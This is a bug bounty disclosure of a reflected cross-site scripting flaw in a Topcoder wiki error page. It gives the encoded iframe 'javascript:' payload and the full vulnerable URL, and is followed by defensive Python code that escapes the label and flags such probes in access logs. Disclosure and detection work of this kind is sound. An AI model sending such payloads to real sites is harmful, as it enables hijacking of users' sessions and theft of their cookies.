Topcoder: Cross Site Scripting via CVE-2018-5230 on https://apps.topcoder.com

2020-01-23T06:16:46
ID H1:781284
Type hackerone
Reporter 0x496
Modified 2020-02-24T04:18:47

Description

Hi, I found a reflected XSS on https://apps.topcoder.com via an error message.

Payload: %3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm

Vulnerable link: https://apps.topcoder.com/wiki/labels/%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%22%3E.vm

Steps to reproduce: Create an account and visit the vulnerable URL.

{F693517}

References:

https://www.cvedetails.com/cve/CVE-2018-5230/
https://www.exploit-db.com/exploits/37791

Best regards.

Impact

Hackers can steal the victim's cookies.
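The two things a defender wants from a report like this are the fix (the label taken from the path must be contextually HTML-escaped before it is echoed into the error page) and a way to spot probes against the endpoint in access logs. The following is an added example and is not code from the report, from Topcoder, or from the affected wiki software; the shape of the error message, the Apache-style log format and the sample log lines are all constructed here for illustration.

```python
import html
import re
from urllib.parse import unquote

def render_label_error(label: str) -> str:
    """Hypothetical 'label not found' fragment. The user-controlled label is
    HTML-escaped (including quotes) so any markup in the path segment is
    rendered as text instead of being interpreted by the browser."""
    safe = html.escape(label, quote=True)
    return f"<p>No content found for label <b>{safe}</b>.</p>"

# Matches the request path of a GET/POST to the labels endpoint in an
# Apache/NCSA-style access log line (assumed log format).
LABELS_PATH = re.compile(r'"(?:GET|POST) (/wiki/labels/[^ "]+)')
MARKUP = re.compile(r"[<>\"']|javascript:", re.IGNORECASE)

def suspicious_label_requests(log_lines):
    """Return (raw_path, decoded_segment) pairs for requests whose decoded
    label segment contains markup characters or a javascript: scheme.
    Defender-side triage only; it flags, it does not block."""
    hits = []
    for line in log_lines:
        m = LABELS_PATH.search(line)
        if not m:
            continue
        path = m.group(1)
        segment = unquote(path[len("/wiki/labels/"):])
        # Decode a second time so double-encoded probes are also surfaced.
        segment = unquote(segment)
        if MARKUP.search(segment):
            hits.append((path, segment))
    return hits

# Constructed sample log lines (not taken from the report or any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jan/2020:06:00:01 +0000] '
    '"GET /wiki/labels/security.vm HTTP/1.1" 200 512',
    '203.0.113.9 - - [23/Jan/2020:06:00:02 +0000] '
    '"GET /wiki/labels/%3CIFRAME%20SRC%3D%22javascript%3Aalert(%27XSS%27)%22%3E.vm HTTP/1.1" 200 1024',
    '198.51.100.2 - - [23/Jan/2020:06:00:03 +0000] '
    '"GET /wiki/pages/viewpage.action?pageId=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    # The escaped fragment contains no live tag from the label.
    print(render_label_error('<IFRAME SRC="javascript:alert(1)">'))
    for path, decoded in suspicious_label_requests(SAMPLE_LOG):
        print("suspicious label request:", path, "->", decoded)
```

Escaping on output is the durable fix; the log check is a triage aid for finding who probed the endpoint before the patch was applied, and decoding twice keeps it from being blinded by double-encoded paths. Marking the session cookie HttpOnly limits the cookie theft named in the Impact section but does not remove the XSS itself.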